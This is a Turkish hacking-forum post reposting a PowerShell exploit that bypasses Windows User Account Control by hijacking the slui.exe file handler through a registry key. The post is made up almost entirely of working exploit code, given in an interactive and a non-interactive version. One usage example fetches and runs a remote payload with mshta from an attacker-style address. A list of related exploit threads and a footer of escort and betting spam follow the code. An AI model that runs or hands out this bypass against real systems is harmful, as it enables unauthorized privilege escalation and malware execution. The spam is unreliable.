[rootturkhacks.com~]
duyuru LiNK KISALTMAK / TEMA VEYA SCRiPT iSTEĞiNDE BULUNMAK YASAKTIR!
duyuru GiZLi iÇERiKLERE "asdafsdfsdf" TARZI YORUM YAPMAK BAN SEBEBIDIR !
hack forum

Microsoft Windows - UAC Protection Bypass (Via Slui File Handler Hijack) (PowerShell)

#1
Kod:
Interactive Version:

<#
.SYNOPSIS
       This script is a proof of concept to bypass the User Access Control (UAC) via SluiFileHandlerHijackLPE
.NOTES
       Function   : SluiHijackBypass
       File Name  : SluiHijackBypass.ps1
       Author     : Gushmazuko
.LINK
       https://github.com/gushmazuko/WinBypass/blob/master/SluiHijackBypass.ps1
       Original source: https://bytecode77.com/hacking/exploits/uac-bypass/slui-file-handler-hijack-privilege-escalation
.EXAMPLE
       Load "cmd.exe" (By Default used 'arch 64'):
       SluiHijackBypass -command "cmd.exe" -arch 64

       Load "mshta http://192.168.0.30:4444/0HUGN"
       SluiHijackBypass -command "mshta http://192.168.0.30:4444/0HUGN"
#>

function SluiHijackBypass(){
       Param (

               [Parameter(Mandatory=$True)]
               [String]$command,
               [ValidateSet(64,86)]
               [int]$arch = 64
       )

       #Create registry structure
       New-Item "HKCU:\Software\Classes\exefile\shell\open\command" -Force
       Set-ItemProperty -Path "HKCU:\Software\Classes\exefile\shell\open\command" -Name "(default)" -Value $command -Force

       #Perform the bypass
       switch($arch)
       {
               64
               {
                       #x64 shell in Windows x64 | x86 shell in Windows x86
                       Start-Process "C:\Windows\System32\slui.exe" -Verb runas
               }
               86
               {
                       #x86 shell in Windows x64
                       C:\Windows\Sysnative\cmd.exe /c "powershell Start-Process C:\Windows\System32\slui.exe -Verb runas"
               }
       }

       #Remove registry structure
       Start-Sleep 3
       Remove-Item "HKCU:\Software\Classes\exefile\shell\" -Recurse -Force
}


################################################################################


Non-Interactive Version:

<#
.SYNOPSIS
 Noninteractive version of script, for directly execute.
 This script is a proof of concept to bypass the User Access Control (UAC) via SluiFileHandlerHijackLPE
.NOTES
       File Name  : SluiHijackBypass_direct.ps1
       Author     : Gushmazuko
.LINK
       https://github.com/gushmazuko/WinBypass/blob/master/SluiHijackBypass_direct.ps1
       Original source: https://bytecode77.com/hacking/exploits/uac-bypass/slui-file-handler-hijack-privilege-escalation
.EXAMPLE
       Load "cmd.exe" (By Default used 'arch 64'):
       powershell -exec bypass .\SluiHijackBypass_direct.ps1
#>

$program = "cmd.exe"
New-Item "HKCU:\Software\Classes\exefile\shell\open\command" -Force
Set-ItemProperty -Path "HKCU:\Software\Classes\exefile\shell\open\command" -Name "(default)" -Value $program -Force
#For x64 shell in Windows x64:
Start-Process "C:\Windows\System32\slui.exe" -Verb runas
#For x86 shell in Windows x64:
#C:\Windows\Sysnative\cmd.exe /c "powershell Start-Process "C:\Windows\System32\slui.exe" -Verb runas"
Start-Sleep 3
Remove-Item "HKCU:\Software\Classes\exefile\shell\" -Recurse -Force

#  0day.today [2019-06-18]  #
imza
Kırık link ve kural ihlallerini ihbar ediniz
[Resim: QP9DEZ.jpg]
Alıntı


Benzer Konular...
Konu: Yazar Cevaplar: Gösterim: Son Mesaj
  WordPress Drag and Drop File Upload Contact Form 1.3.3.2 - Remote Code Execution Expl 0bir 0 9 05-28-2020, 04:36 PM
Son Mesaj: 0bir
  Joomla XCloner Backup 3.5.3 Plugin - Local File Inclusion (Authenticated) Vulnerabili 0bir 0 10 05-28-2020, 04:35 PM
Son Mesaj: 0bir
  Druva inSync Windows Client 6.6.3 - Local Privilege Escalation Exploit 0bir 0 5 05-28-2020, 04:29 PM
Son Mesaj: 0bir
  Protection Licensing Toolkit ReadyAPI 3.2.5 Code Execution / Deserialization Vulnerab 0bir 0 28 05-22-2020, 09:25 AM
Son Mesaj: 0bir
  Victor CMS 1.0 - Authenticated Arbitrary File Upload Vulnerability 0bir 0 10 05-22-2020, 09:15 AM
Son Mesaj: 0bir



Bu konuyu görüntüleyen kullanıcı(lar): 1 Ziyaretçi
brazzers premium accounts Istanbul escort Istanbul escort istanbul escort ankara escort istanbul escort eryaman escort etimesgut escort izmit escort En iyi bahis siteleri buca escort porno beylikdüzü escort eskişehir escort